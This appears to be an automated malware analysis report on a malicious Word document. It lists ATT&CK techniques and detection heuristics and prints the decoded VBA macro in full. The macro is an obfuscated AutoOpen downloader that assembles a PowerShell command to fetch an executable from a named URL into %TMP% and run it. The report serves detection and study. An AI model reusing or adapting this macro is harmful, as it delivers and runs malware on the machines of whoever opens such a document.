MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes CreateObject to instantiate WScript.Shell, which is then used to execute a command. The script attempts to download and run a second-stage payload from the URL http://wmcforyou.com/f. The obfuscated nature of the script and the use of a suspicious URL contribute to the assessment.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://wmcforyou.com/f In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3419 bytes |
SHA-256: da6051d39735e91dc608d3daed8ce17b8dba4f42a6aec13a064e143bb9768d84 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "sidjfuhe"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
OeKIJEFHuEg = pfjxy.mghui
Set OJfiHEUhfOEjfUHEg = CreateObject( _
"" & sidjfuhe.suYEfgIIefh & OeKIJEFHuEg & "t.She" & "ll")
OJfiHEUhfOEjfUHEg.Run OIEfiEHufEt(), 0
End Sub
Function JoejHRhjd()
pWI9fe9Uuf = EOjfei + eoJFEheiuh + ejfieHuefh + oejfenf
pWI9fe9Uuf = EOjfei + eoJFEheiuh + ejfieHuefh + oejfenf
JoejHRhjd = udgyset.OEjfijfIEJfg + ofjtb.OefjIEhfUEf
End Function
Function ishduse()
oijvisjie = udgyset.ihhUEHfu
ishduse = udgyset.PkfOEhfuE + sidjfuhe.JoejHRhjd + oijvisjie
End Function
Function fJEIfhuE()
fJEIfhuE = pfjxy.DgeT
End Function
Function suYEfgIIefh()
UYefgYYef = "W"
OfjiHUegEtW = pfjxy.Tag
OEfjIJjjIEh = "c"
pEKfoEOit = UYefgYYef
suYEfgIIefh = pEKfoEOit + OfjiHUegEtW + OEfjIJjjIEh
End Function
Attribute VB_Name = "ofjtb"
Function OefjIEhfUEf()
OefjIEhfUEf = pfjxy.Caption + pfjxy.JoeJRt + "('" + iHEuhfi.ososiehut + "ilesfju" + iHEuhfi.osheut + "',"
End Function
Function OIEfiEHufEt()
Dim hsehEYg
Dim PejfiUWHGf
pjeaWYGfg = bxugdyEE + Mndshue
bxugdyEE = hsehEYg + PejfiUWHGf + kihIEHhufhw
Dim MVieHEuhfYEf
MVieHEuhfYEf = vnoNEjfEhgiE + MFojoEJfEJo + ojvsjiet + NfiEIHihEI
pWI9fe9Uuf = EOjfei + eoJFEheiuh + ejfieHuefh + oejfenf
pWI9fe9Uuf = EOjfei + eoJFEheiuh + ejfieHuefh + oejfenf
pWI9fe9Uuf = EOjfei + eoJFEheiuh + ejfieHuefh + oejfenf
UfyEGfyGEgbvfgh = ivihahuh + OJEIihIEHife
OJFehfuuH = sidjfuhe.fJEIfhuE
JEifiEFUEhfuH = udgyset.isdhuhfue + " " + sidjfuhe.ishduse
IfhUHEgfyYE = OJFehfuuH + " " + JEifiEFUEhfuH + " "
OIEfiEHufEt = IfhUHEgfyYE
End Function
Attribute VB_Name = "pfjxy"
Attribute VB_Base = "0{033C35F1-FB77-4B51-A11B-A08788DDA781}{6E115756-F881-476E-A40E-8717BCFD8B5D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "iiEigiEHg"
Attribute VB_Base = "0{97F49C76-C4BC-49D0-8DA2-96976B0A46B2}{6781A066-E538-467F-84EB-4D592695E421}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "iHEuhfi"
Attribute VB_Base = "0{1EAED6AB-4414-4DA9-8E47-5AB91E302C17}{9388FD0F-44A8-4ED9-B556-9E9C0FA397D4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "udgyset"
Function OEjfijfIEJfg()
OEjfijfIEJfg = "(Ne" + "w-Obj" + iiEigiEHg.igjrhuey + " " + iiEigiEHg.NdifuE + "et.We" + iiEigiEHg.mviehut + "t)"
End Function
Function PefkIehfE()
IfjUfBvE = "tart-"
PefkIehfE = "'%TMP%\filesfjuds6fr22.exe');S" + IfjUfBvE + "Pro" + "cess '%TMP%\filesfjuds6fr22.exe';"
End Function
Function PkfOEhfuE()
PkfOEhfuE = iiEigiEHg.osdjie + iiEigiEHg.Caption
End Function
Function ihhUEHfu()
ihhUEHfu = udgyset.PefkIehfE
End Function
Function isdhuhfue()
isdhuhfue = "/c"
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.